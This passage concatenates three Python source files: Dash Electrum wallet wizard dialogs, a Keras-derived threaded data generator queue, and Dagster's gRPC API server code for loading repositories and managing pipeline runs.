_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
playout = PasswordLayout(msg=msg, kind=kind, OK_button=self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(MSG_HW_STORAGE_ENCRYPTION)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self, **kwargs):
self.accept_signal.emit()
def waiting_dialog(self, task, msg, on_finished=None):
label = WWLabel(msg)
vbox = QVBoxLayout()
vbox.addSpacing(100)
label.setMinimumWidth(300)
label.setAlignment(Qt.AlignCenter)
vbox.addWidget(label)
self.set_layout(vbox, next_enabled=False)
self.back_button.setEnabled(False)
t = threading.Thread(target=task)
t.start()
while True:
t.join(1.0/60)
if t.is_alive():
self.refresh_gui()
else:
break
if on_finished:
on_finished()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def choice_and_line_dialog(self, title: str, message1: str, choices: List[Tuple[str, str, str]],
message2: str, test_text: Callable[[str], int],
run_next, default_choice_idx: int=0) -> Tuple[str, str]:
vbox = QVBoxLayout()
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
c_default_text = [x[2] for x in choices]
def on_choice_click(clayout):
idx = clayout.selected_index()
line.setText(c_default_text[idx])
clayout = ChoicesLayout(message1, c_titles, on_choice_click,
checked_index=default_choice_idx)
vbox.addLayout(clayout.layout())
vbox.addSpacing(50)
vbox.addWidget(WWLabel(message2))
line = QLineEdit()
def on_text_change(text):
self.next_button.setEnabled(test_text(text))
line.textEdited.connect(on_text_change)
on_choice_click(clayout) # set default text for "line"
vbox.addWidget(line)
self.exec_layout(vbox, title)
choice = c_values[clayout.selected_index()]
return str(line.text()), choice
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=(), warn_issue4566=False):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
if warn_issue4566:
text_whitespace_normalised = ' '.join(text.split())
warn_issue4566_label.setVisible(text != text_whitespace_normalised)
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
warn_issue4566_label = WWLabel(MSG_PASSPHRASE_WARN_ISSUE4566)
warn_issue4566_label.setVisible(False)
vbox.addWidget(warn_issue4566_label)
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMinimumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, alignment=Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return line.text()
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False, for_seed_words=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("Dash Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Dash Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require {0} signatures').format(m))
cw.set_m(m)
def on_n(n):
n_label.setText(_('From {0} cosigners').format(n))
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
data_util.py | '''
this file is modified from keras implemention of data process multi-threading,
see https://github.com/fchollet/keras/blob/master/keras/utils/data_utils.py
'''
import time
import numpy as np
import threading
import multiprocessing
try:
import queue
except ImportError:
import Queue as queue
class GeneratorEnqueuer():
"""Builds a queue out of a data generator.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
# Arguments
generator: a generator function which endlessly yields data
use_multiprocessing: use multiprocessing if True, otherwise threading
wait_time: time to sleep in-between calls to `put()`
random_seed: Initial seed for workers,
will be incremented by one for each workers.
"""
def __init__(self, generator,
use_multiprocessing=False,
wait_time=0.05,
random_seed=None):
self.wait_time = wait_time
self._generator = generator
self._use_multiprocessing = use_multiprocessing
self._threads = []
self._stop_event = None
self.queue = None
self.random_seed = random_seed
def start(self, workers=1, max_queue_size=10):
"""Kicks off threads which add data from the generator into the queue.
# Arguments
workers: number of worker threads
max_queue_size: queue size
(when full, threads could block on `put()`)
"""
def data_generator_task():
while not self._stop_event.is_set():
try:
if self._use_multiprocessing or self.queue.qsize() < max_queue_size:
generator_output = next(self._generator)
self.queue.put(generator_output)
else:
time.sleep(self.wait_time)
except Exception:
self._stop_event.set()
raise
try:
if self._use_multiprocessing:
self.queue = multiprocessing.Queue(maxsize=max_queue_size)
self._stop_event = multiprocessing.Event()
else:
self.queue = queue.Queue()
self._stop_event = threading.Event()
for _ in range(workers):
if self._use_multiprocessing:
# Reset random seed else all children processes
# share the same seed
np.random.seed(self.random_seed)
thread = multiprocessing.Process(target=data_generator_task)
thread.daemon = True
if self.random_seed is not None:
self.random_seed += 1
else:
thread = threading.Thread(target=data_generator_task)
self._threads.append(thread)
thread.start()
except:
self.stop()
raise
def is_running(self):
return self._stop_event is not None and not self._stop_event.is_set()
def stop(self, timeout=None):
"""Stops running threads and wait for them to exit, if necessary.
Should be called by the same thread which called `start()`.
# Arguments
timeout: maximum time to wait on `thread.join()`.
"""
if self.is_running():
self._stop_event.set()
for thread in self._threads:
if thread.is_alive():
if self._use_multiprocessing:
thread.terminate()
else:
thread.join(timeout)
if self._use_multiprocessing:
if self.queue is not None:
self.queue.close()
self._threads = []
self._stop_event = None
self.queue = None
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
# Returns
A generator
"""
while self.is_running():
if not self.queue.empty():
inputs = self.queue.get()
if inputs is not None:
yield inputs
else:
time.sleep(self.wait_time) |
server.py | import math
import multiprocessing
import os
import queue
import sys
import threading
import time
import uuid
from collections import namedtuple
from concurrent.futures import ThreadPoolExecutor
from threading import Event as ThreadingEventType
from time import sleep
from typing import NamedTuple
import grpc
from grpc_health.v1 import health, health_pb2, health_pb2_grpc
from dagster import check, seven
from dagster.core.code_pointer import CodePointer
from dagster.core.definitions.reconstructable import ReconstructableRepository
from dagster.core.errors import DagsterUserCodeUnreachableError
from dagster.core.host_representation.external_data import external_repository_data_from_def
from dagster.core.host_representation.origin import ExternalPipelineOrigin, ExternalRepositoryOrigin
from dagster.core.instance import DagsterInstance
from dagster.core.origin import DEFAULT_DAGSTER_ENTRY_POINT, get_python_environment_entry_point
from dagster.core.types.loadable_target_origin import LoadableTargetOrigin
from dagster.serdes import (
deserialize_json_to_dagster_namedtuple,
serialize_dagster_namedtuple,
whitelist_for_serdes,
)
from dagster.serdes.ipc import IPCErrorMessage, ipc_write_stream, open_ipc_subprocess
from dagster.utils import find_free_port, frozenlist, safe_tempfile_path_unmanaged
from dagster.utils.error import SerializableErrorInfo, serializable_error_info_from_exc_info
from .__generated__ import api_pb2
from .__generated__.api_pb2_grpc import DagsterApiServicer, add_DagsterApiServicer_to_server
from .impl import (
RunInSubprocessComplete,
StartRunInSubprocessSuccessful,
get_external_execution_plan_snapshot,
get_external_pipeline_subset_result,
get_external_schedule_execution,
get_external_sensor_execution,
get_notebook_data,
get_partition_config,
get_partition_names,
get_partition_set_execution_param_data,
get_partition_tags,
start_run_in_subprocess,
)
from .types import (
CanCancelExecutionRequest,
CanCancelExecutionResult,
CancelExecutionRequest,
CancelExecutionResult,
ExecuteExternalPipelineArgs,
ExecutionPlanSnapshotArgs,
ExternalScheduleExecutionArgs,
GetCurrentImageResult,
ListRepositoriesResponse,
LoadableRepositorySymbol,
PartitionArgs,
PartitionNamesArgs,
PartitionSetExecutionParamArgs,
PipelineSubsetSnapshotArgs,
SensorExecutionArgs,
ShutdownServerResult,
StartRunResult,
)
from .utils import get_loadable_targets, max_rx_bytes, max_send_bytes
EVENT_QUEUE_POLL_INTERVAL = 0.1
CLEANUP_TICK = 0.5
STREAMING_CHUNK_SIZE = 4000000
class CouldNotBindGrpcServerToAddress(Exception):
pass
class LoadedRepositories:
def __init__(self, loadable_target_origin, entry_point):
self._loadable_target_origin = loadable_target_origin
self._code_pointers_by_repo_name = {}
self._recon_repos_by_name = {}
self._loadable_repository_symbols = []
if not loadable_target_origin:
return
loadable_targets = get_loadable_targets(
loadable_target_origin.python_file,
loadable_target_origin.module_name,
loadable_target_origin.package_name,
loadable_target_origin.working_directory,
loadable_target_origin.attribute,
)
for loadable_target in loadable_targets:
pointer = _get_code_pointer(loadable_target_origin, loadable_target)
recon_repo = ReconstructableRepository(
pointer,
_get_current_image(),
sys.executable,
entry_point=entry_point,
)
repo_def = recon_repo.get_definition()
# force load of all lazy constructed jobs/pipelines
repo_def.get_all_pipelines()
self._code_pointers_by_repo_name[repo_def.name] = pointer
self._recon_repos_by_name[repo_def.name] = recon_repo
self._loadable_repository_symbols.append(
LoadableRepositorySymbol(
attribute=loadable_target.attribute,
repository_name=repo_def.name,
)
)
@property
def loadable_repository_symbols(self):
return self._loadable_repository_symbols
@property
def code_pointers_by_repo_name(self):
return self._code_pointers_by_repo_name
def get_recon_repo(self, name: str) -> ReconstructableRepository:
return self._recon_repos_by_name[name]
def _get_code_pointer(loadable_target_origin, loadable_repository_symbol):
if loadable_target_origin.python_file:
return CodePointer.from_python_file(
loadable_target_origin.python_file,
loadable_repository_symbol.attribute,
loadable_target_origin.working_directory,
)
elif loadable_target_origin.package_name:
return CodePointer.from_python_package(
loadable_target_origin.package_name,
loadable_repository_symbol.attribute,
loadable_target_origin.working_directory,
)
else:
return CodePointer.from_module(
loadable_target_origin.module_name,
loadable_repository_symbol.attribute,
loadable_target_origin.working_directory,
)
class DagsterApiServer(DagsterApiServicer):
# The loadable_target_origin is currently Noneable to support instaniating a server.
# This helps us test the ping methods, and incrementally migrate each method to
# the target passed in here instead of passing in a target in the argument.
def __init__(
self,
server_termination_event,
loadable_target_origin=None,
heartbeat=False,
heartbeat_timeout=30,
lazy_load_user_code=False,
fixed_server_id=None,
entry_point=None,
):
super(DagsterApiServer, self).__init__()
check.bool_param(heartbeat, "heartbeat")
check.int_param(heartbeat_timeout, "heartbeat_timeout")
check.invariant(heartbeat_timeout > 0, "heartbeat_timeout must be greater than 0")
self._server_termination_event = check.inst_param(
server_termination_event, "server_termination_event", ThreadingEventType
)
self._loadable_target_origin = check.opt_inst_param(
loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin
)
self._mp_ctx = multiprocessing.get_context("spawn")
# Each server is initialized with a unique UUID. This UUID is used by clients to track when
# servers are replaced and is used for cache invalidation and reloading.
self._server_id = check.opt_str_param(fixed_server_id, "fixed_server_id", str(uuid.uuid4()))
# Client tells the server to shutdown by calling ShutdownServer (or by failing to send a
# hearbeat, at which point this event is set. The cleanup thread will then set the server
# termination event once all current executions have finished, which will stop the server)
self._shutdown_once_executions_finish_event = threading.Event()
# Dict[str, (multiprocessing.Process, DagsterInstance)]
self._executions = {}
# Dict[str, multiprocessing.Event]
self._termination_events = {}
self._termination_times = {}
self._execution_lock = threading.Lock()
self._serializable_load_error = None
self._entry_point = (
frozenlist(check.list_param(entry_point, "entry_point", of_type=str))
if entry_point != None
else DEFAULT_DAGSTER_ENTRY_POINT
)
try:
self._loaded_repositories = LoadedRepositories(
loadable_target_origin, self._entry_point
)
except Exception:
if not lazy_load_user_code:
raise
self._loaded_repositories = None
self._serializable_load_error = serializable_error_info_from_exc_info(sys.exc_info())
self.__last_heartbeat_time = time.time()
if heartbeat:
self.__heartbeat_thread = threading.Thread(
target=self._heartbeat_thread,
args=(heartbeat_timeout,),
name="grpc-server-heartbeat",
)
self.__heartbeat_thread.daemon = True
self.__heartbeat_thread.start()
else:
self.__heartbeat_thread = None
self.__cleanup_thread = threading.Thread(
target=self._cleanup_thread, args=(), name="grpc-server-cleanup"
)
self.__cleanup_thread.daemon = True
self.__cleanup_thread.start()
def cleanup(self):
if self.__heartbeat_thread:
self.__heartbeat_thread.join()
self.__cleanup_thread.join()
def _heartbeat_thread(self, heartbeat_timeout):
while True:
self._shutdown_once_executions_finish_event.wait(heartbeat_timeout)
if self._shutdown_once_executions_finish_event.is_set():
break
if self.__last_heartbeat_time < time.time() - heartbeat_timeout:
self._shutdown_once_executions_finish_event.set()
def _cleanup_thread(self):
while True:
self._server_termination_event.wait(CLEANUP_TICK)
if self._server_termination_event.is_set():
break
self._check_for_orphaned_runs()
def _check_for_orphaned_runs(self):
with self._execution_lock:
runs_to_clear = []
for run_id, (process, instance_ref) in self._executions.items():
if not process.is_alive():
with DagsterInstance.from_ref(instance_ref) as instance:
runs_to_clear.append(run_id)
run = instance.get_run_by_id(run_id)
if not run or run.is_finished:
continue
# the process died in an unexpected manner. inform the system
message = (
f"Run execution process for {run.run_id} unexpectedly "
f"exited with exit code {process.exitcode}."
)
instance.report_engine_event(message, run, cls=self.__class__)
instance.report_run_failed(run)
for run_id in runs_to_clear:
self._clear_run(run_id)
# Once there are no more running executions after we have received a request to
# shut down, terminate the server
if self._shutdown_once_executions_finish_event.is_set():
if len(self._executions) == 0:
self._server_termination_event.set()
# Assumes execution lock is being held
def _clear_run(self, run_id):
del self._executions[run_id]
del self._termination_events[run_id]
if run_id in self._termination_times:
del self._termination_times[run_id]
def _recon_repository_from_origin(
self, external_repository_origin: ExternalRepositoryOrigin
) -> ReconstructableRepository:
# could assert against external_repository_origin.repository_location_origin
return self._loaded_repositories.get_recon_repo(external_repository_origin.repository_name)
def _recon_pipeline_from_origin(self, external_pipeline_origin: ExternalPipelineOrigin):
recon_repo = self._recon_repository_from_origin(
external_pipeline_origin.external_repository_origin
)
return recon_repo.get_reconstructable_pipeline(external_pipeline_origin.pipeline_name)
def Ping(self, request, _context):
echo = request.echo
return api_pb2.PingReply(echo=echo)
def StreamingPing(self, request, _context):
sequence_length = request.sequence_length
echo = request.echo
for sequence_number in range(sequence_length):
yield api_pb2.StreamingPingEvent(sequence_number=sequence_number, echo=echo)
def Heartbeat(self, request, _context):
self.__last_heartbeat_time = time.time()
echo = request.echo
return api_pb2.PingReply(echo=echo)
def GetServerId(self, _request, _context):
return api_pb2.GetServerIdReply(server_id=self._server_id)
def ExecutionPlanSnapshot(self, request, _context):
execution_plan_args = deserialize_json_to_dagster_namedtuple(
request.serialized_execution_plan_snapshot_args
)
check.inst_param(execution_plan_args, "execution_plan_args", ExecutionPlanSnapshotArgs)
recon_pipeline = self._recon_pipeline_from_origin(execution_plan_args.pipeline_origin)
execution_plan_snapshot_or_error = get_external_execution_plan_snapshot(
recon_pipeline, execution_plan_args
)
return api_pb2.ExecutionPlanSnapshotReply(
serialized_execution_plan_snapshot=serialize_dagster_namedtuple(
execution_plan_snapshot_or_error
)
)
def ListRepositories(self, request, _context):
if self._serializable_load_error:
return api_pb2.ListRepositoriesReply(
serialized_list_repositories_response_or_error=serialize_dagster_namedtuple(
self._serializable_load_error
)
)
response = ListRepositoriesResponse(
self._loaded_repositories.loadable_repository_symbols,
executable_path=self._loadable_target_origin.executable_path
if self._loadable_target_origin
else None,
repository_code_pointer_dict=self._loaded_repositories.code_pointers_by_repo_name,
entry_point=self._entry_point,
)
return api_pb2.ListRepositoriesReply(
serialized_list_repositories_response_or_error=serialize_dagster_namedtuple(response)
)
def ExternalPartitionNames(self, request, _context):
partition_names_args = deserialize_json_to_dagster_namedtuple(
request.serialized_partition_names_args
)
check.inst_param(partition_names_args, "partition_names_args", PartitionNamesArgs)
recon_repo = self._recon_repository_from_origin(partition_names_args.repository_origin)
return api_pb2.ExternalPartitionNamesReply(
serialized_external_partition_names_or_external_partition_execution_error=serialize_dagster_namedtuple(
get_partition_names(
recon_repo,
partition_names_args.partition_set_name,
)
)
)
def ExternalNotebookData(self, request, _context):
notebook_path = request.notebook_path
check.str_param(notebook_path, "notebook_path")
return api_pb2.ExternalNotebookDataReply(content=get_notebook_data(notebook_path))
def ExternalPartitionSetExecutionParams(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(
request.serialized_partition_set_execution_param_args
)
check.inst_param(
args,
"args",
PartitionSetExecutionParamArgs,
)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
serialized_data = serialize_dagster_namedtuple(
get_partition_set_execution_param_data(
recon_repo=recon_repo,
partition_set_name=args.partition_set_name,
partition_names=args.partition_names,
)
)
yield from self._split_serialized_data_into_chunk_events(serialized_data)
def ExternalPartitionConfig(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(request.serialized_partition_args)
check.inst_param(args, "args", PartitionArgs)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
return api_pb2.ExternalPartitionConfigReply(
serialized_external_partition_config_or_external_partition_execution_error=serialize_dagster_namedtuple(
get_partition_config(recon_repo, args.partition_set_name, args.partition_name)
)
)
def ExternalPartitionTags(self, request, _context):
partition_args = deserialize_json_to_dagster_namedtuple(request.serialized_partition_args)
check.inst_param(partition_args, "partition_args", PartitionArgs)
recon_repo = self._recon_repository_from_origin(partition_args.repository_origin)
return api_pb2.ExternalPartitionTagsReply(
serialized_external_partition_tags_or_external_partition_execution_error=serialize_dagster_namedtuple(
get_partition_tags(
recon_repo, partition_args.partition_set_name, partition_args.partition_name
)
)
)
def ExternalPipelineSubsetSnapshot(self, request, _context):
pipeline_subset_snapshot_args = deserialize_json_to_dagster_namedtuple(
request.serialized_pipeline_subset_snapshot_args
)
check.inst_param(
pipeline_subset_snapshot_args,
"pipeline_subset_snapshot_args",
PipelineSubsetSnapshotArgs,
)
return api_pb2.ExternalPipelineSubsetSnapshotReply(
serialized_external_pipeline_subset_result=serialize_dagster_namedtuple(
get_external_pipeline_subset_result(
self._recon_pipeline_from_origin(pipeline_subset_snapshot_args.pipeline_origin),
pipeline_subset_snapshot_args.solid_selection,
)
)
)
def _get_serialized_external_repository_data(self, request):
repository_origin = deserialize_json_to_dagster_namedtuple(
request.serialized_repository_python_origin
)
check.inst_param(repository_origin, "repository_origin", ExternalRepositoryOrigin)
recon_repo = self._recon_repository_from_origin(repository_origin)
return serialize_dagster_namedtuple(
external_repository_data_from_def(recon_repo.get_definition())
)
def ExternalRepository(self, request, _context):
serialized_external_repository_data = self._get_serialized_external_repository_data(request)
return api_pb2.ExternalRepositoryReply(
serialized_external_repository_data=serialized_external_repository_data,
)
def StreamingExternalRepository(self, request, _context):
serialized_external_repository_data = self._get_serialized_external_repository_data(request)
num_chunks = int(
math.ceil(float(len(serialized_external_repository_data)) / STREAMING_CHUNK_SIZE)
)
for i in range(num_chunks):
start_index = i * STREAMING_CHUNK_SIZE
end_index = min(
(i + 1) * STREAMING_CHUNK_SIZE,
len(serialized_external_repository_data),
)
yield api_pb2.StreamingExternalRepositoryEvent(
sequence_number=i,
serialized_external_repository_chunk=serialized_external_repository_data[
start_index:end_index
],
)
def _split_serialized_data_into_chunk_events(self, serialized_data):
num_chunks = int(math.ceil(float(len(serialized_data)) / STREAMING_CHUNK_SIZE))
for i in range(num_chunks):
start_index = i * STREAMING_CHUNK_SIZE
end_index = min(
(i + 1) * STREAMING_CHUNK_SIZE,
len(serialized_data),
)
yield api_pb2.StreamingChunkEvent(
sequence_number=i,
serialized_chunk=serialized_data[start_index:end_index],
)
def ExternalScheduleExecution(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(
request.serialized_external_schedule_execution_args
)
check.inst_param(
args,
"args",
ExternalScheduleExecutionArgs,
)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
serialized_schedule_data = serialize_dagster_namedtuple(
get_external_schedule_execution(
recon_repo,
args.instance_ref,
args.schedule_name,
args.scheduled_execution_timestamp,
args.scheduled_execution_timezone,
)
)
yield from self._split_serialized_data_into_chunk_events(serialized_schedule_data)
def ExternalSensorExecution(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(
request.serialized_external_sensor_execution_args
)
check.inst_param(args, "args", SensorExecutionArgs)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
serialized_sensor_data = serialize_dagster_namedtuple(
get_external_sensor_execution(
recon_repo,
args.instance_ref,
args.sensor_name,
args.last_completion_time,
args.last_run_key,
args.cursor,
)
)
yield from self._split_serialized_data_into_chunk_events(serialized_sensor_data)
def ShutdownServer(self, request, _context):
try:
self._shutdown_once_executions_finish_event.set()
return api_pb2.ShutdownServerReply(
serialized_shutdown_server_result=serialize_dagster_namedtuple(
ShutdownServerResult(success=True, serializable_error_info=None)
)
)
except:
return api_pb2.ShutdownServerReply(
serialized_shutdown_server_result=serialize_dagster_namedtuple(
ShutdownServerResult(
success=False,
serializable_error_info=serializable_error_info_from_exc_info(
sys.exc_info()
),
)
)
)
def CancelExecution(self, request, _context):
success = False
message = None
serializable_error_info = None
try:
cancel_execution_request = check.inst(
deserialize_json_to_dagster_namedtuple(request.serialized_cancel_execution_request),
CancelExecutionRequest,
)
with self._execution_lock:
if cancel_execution_request.run_id in self._executions:
self._termination_events[cancel_execution_request.run_id].set()
self._termination_times[cancel_execution_request.run_id] = time.time()
success = True
except:
serializable_error_info = serializable_error_info_from_exc_info(sys.exc_info())
return api_pb2.CancelExecutionReply(
serialized_cancel_execution_result=serialize_dagster_namedtuple(
CancelExecutionResult(
success=success,
message=message,
serializable_error_info=serializable_error_info,
)
)
)
def CanCancelExecution(self, request, _context):
can_cancel_execution_request = check.inst(
deserialize_json_to_dagster_namedtuple(request.serialized_can_cancel_execution_request),
CanCancelExecutionRequest,
)
with self._execution_lock:
run_id = can_cancel_execution_request.run_id
can_cancel = (
run_id in self._executions and not self._termination_events[run_id].is_set()
)
return api_pb2.CanCancelExecutionReply(
serialized_can_cancel_execution_result=serialize_dagster_namedtuple(
CanCancelExecutionResult(can_cancel=can_cancel)
)
)
def StartRun(self, request, _context):
if self._shutdown_once_executions_finish_event.is_set():
return api_pb2.StartRunReply(
serialized_start_run_result=serialize_dagster_namedtuple(
StartRunResult(
success=False,
message="Tried to start a run on a server after telling it to shut down",
serializable_error_info=None,
)
)
)
try:
execute_run_args = check.inst(
deserialize_json_to_dagster_namedtuple(request.serialized_execute_run_args),
ExecuteExternalPipelineArgs,
)
run_id = execute_run_args.pipeline_run_id
recon_pipeline = self._recon_pipeline_from_origin(execute_run_args.pipeline_origin)
except:
return api_pb2.StartRunReply(
serialized_start_run_result=serialize_dagster_namedtuple(
StartRunResult(
success=False,
message=None,
serializable_error_info=serializable_error_info_from_exc_info(
sys.exc_info()
),
)
)
)
event_queue = self._mp_ctx.Queue()
termination_event = self._mp_ctx.Event()
execution_process = self._mp_ctx.Process(
target=start_run_in_subprocess,
args=[
request.serialized_execute_run_args,
recon_pipeline,
event_queue,
termination_event,
],
)
with self._execution_lock:
execution_process.start()
self._executions[run_id] = (
execution_process,
execute_run_args.instance_ref,
)
self._termination_events[run_id] = termination_event
success = None
message = None
serializable_error_info = None
while success is None:
sleep(EVENT_QUEUE_POLL_INTERVAL)
# We use `get_nowait()` instead of `get()` so that we can handle the case where the
# execution process has died unexpectedly -- `get()` would hang forever in that case
try:
dagster_event_or_ipc_error_message_or_done = event_queue.get_nowait()
except queue.Empty:
if not execution_process.is_alive():
# subprocess died unexpectedly
success = False
message = (
"GRPC server: Subprocess for {run_id} terminated unexpectedly with "
"exit code {exit_code}".format(
run_id=run_id,
exit_code=execution_process.exitcode,
)
)
serializable_error_info = serializable_error_info_from_exc_info(sys.exc_info())
else:
if isinstance(
dagster_event_or_ipc_error_message_or_done, StartRunInSubprocessSuccessful
):
success = True
elif isinstance(
dagster_event_or_ipc_error_message_or_done, RunInSubprocessComplete
):
continue
if isinstance(dagster_event_or_ipc_error_message_or_done, IPCErrorMessage):
success = False
message = dagster_event_or_ipc_error_message_or_done.message
serializable_error_info = (
dagster_event_or_ipc_error_message_or_done.serializable_error_info
)
# Ensure that if the run failed, we remove it from the executions map before
# returning so that CanCancel will never return True
if not success:
with self._execution_lock:
self._clear_run(run_id)
return api_pb2.StartRunReply(
serialized_start_run_result=serialize_dagster_namedtuple(
StartRunResult(
success=success,
message=message,
serializable_error_info=serializable_error_info,
)
)
)
def GetCurrentImage(self, request, _context):
return api_pb2.GetCurrentImageReply(
serialized_current_image=serialize_dagster_namedtuple(
GetCurrentImageResult(
current_image=_get_current_image(), serializable_error_info=None
)
)
)
def _get_current_image():
return os.getenv("DAGSTER_CURRENT_IMAGE")
@whitelist_for_serdes
class GrpcServerStartedEvent(namedtuple("GrpcServerStartedEvent", "")):
pass
@whitelist_for_serdes
class GrpcServerFailedToBindEvent(namedtuple("GrpcServerStartedEvent", "")):
pass
@whitelist_for_serdes
class GrpcServerLoadErrorEvent(
NamedTuple("GrpcServerLoadErrorEvent", [("error_info", SerializableErrorInfo)])
):
def __new__(cls, error_info: SerializableErrorInfo):
return super(GrpcServerLoadErrorEvent, cls).__new__(
cls,
check.inst_param(error_info, "error_info", SerializableErrorInfo),
)
def server_termination_target(termination_event, server):
termination_event.wait()
# We could make this grace period configurable if we set it in the ShutdownServer handler
server.stop(grace=5)
class DagsterGrpcServer:
def __init__(
self,
host="localhost",
port=None,
socket=None,
max_workers=None,
loadable_target_origin=None,
heartbeat=False,
heartbeat_timeout=30,
lazy_load_user_code=False,
ipc_output_file=None,
fixed_server_id=None,
entry_point=None,
):
check.opt_str_param(host, "host")
check.opt_int_param(port, "port")
check.opt_str_param(socket, "socket")
check.opt_int_param(max_workers, "max_workers")
check.opt_inst_param(loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin)
check.invariant(
port is not None if seven.IS_WINDOWS else True,
"You must pass a valid `port` on Windows: `socket` not supported.",
)
check.invariant(
(port or socket) and not (port and socket),
"You must pass one and only one of `port` or `socket`.",
)
check.invariant(
host is not None if port else True,
"Must provide a host when serving on a port",
)
check.bool_param(heartbeat, "heartbeat")
check.int_param(heartbeat_timeout, "heartbeat_timeout")
self._ipc_output_file = check.opt_str_param(ipc_output_file, "ipc_output_file")
check.opt_str_param(fixed_server_id, "fixed_server_id")
check.invariant(heartbeat_timeout > 0, "heartbeat_timeout must be greater than 0")
check.invariant(
max_workers is None or max_workers > 1 if heartbeat else True,
"max_workers must be greater than 1 or set to None if heartbeat is True. "
"If set to None, the server will use the gRPC default.",
)
self.server = grpc.server(
ThreadPoolExecutor(max_workers=max_workers),
compression=grpc.Compression.Gzip,
options=[
("grpc.max_send_message_length", max_send_bytes()),
("grpc.max_receive_message_length", max_rx_bytes()),
],
)
self._server_termination_event = threading.Event()
try:
self._api_servicer = DagsterApiServer(
server_termination_event=self._server_termination_event,
loadable_target_origin=loadable_target_origin,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
lazy_load_user_code=lazy_load_user_code,
fixed_server_id=fixed_server_id,
entry_point=entry_point,
)
except Exception:
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(
GrpcServerLoadErrorEvent(
error_info=serializable_error_info_from_exc_info(sys.exc_info())
)
)
raise
# Create a health check servicer
self._health_servicer = health.HealthServicer()
